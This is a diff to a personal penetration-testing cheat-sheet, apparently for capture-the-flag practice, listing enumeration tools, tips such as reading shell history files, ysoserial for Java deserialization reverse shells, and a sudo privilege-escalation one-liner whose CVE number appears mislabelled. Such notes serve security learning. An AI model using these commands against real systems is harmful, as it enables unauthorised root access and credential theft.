shatternox/cyber-stuff/notes.md

 11. linpeas linenum pspy name ur shits
 12. Always check `cat ~/.*history | less` or just `history`
 13. Use ysoserial to exploit java deserialization to get revershell or RCE (payload have to be in a file).
 Then use it or encode it first, what ever.
-14. Remember CVE-2019-13287 (ALL, !root) /bin/bash >>> sudo -u#-1 /bin/bash
-15. `.conf` file may contain something. (usually in /etc/apache2)
+14. `.conf` file may contain something. (usually in /etc/apache2)
-16. Stuck?
+15. Stuck?
 Bruteforce with no end?
 Generate your own wordlist with cewl!
 Example: cewl http://10.10.10.191/ -w customwordlist.txt -m 6
-17.
+16.
 - SMB enum >>> smbclient -L //[IP](its_the_same_like_--list=[IP]), and continue with the shares name `smbclient //[IP]/[sharename]`
 - Just `smbclient -h` tbh
-18. rpcclient --user=[username] [target-ip] -W [forest name]
+17. rpcclient --user=[username] [target-ip] -W [forest name]
-19. Check cdata
+18. Check cdata
-20. Port 11211 is memcached server >>> https://www.hackingarticles.in/penetration-testing-on-memcached-server/
+19. Port 11211 is memcached server >>> https://www.hackingarticles.in/penetration-testing-on-memcached-server/
-21. Always check `netstat -tulpn`
+20. Always check `netstat -tulpn`
-22. Enum smtp with telnet.
+21. Enum smtp with telnet.
-23. On windows, always check `whoami /priv` and find recent vulnerability.
+22. On windows, always check `whoami /priv` and find recent vulnerability.

+**CVE-2019-13287**
+(ALL, !root) /bin/bash >>> sudo -u#-1 /bin/bash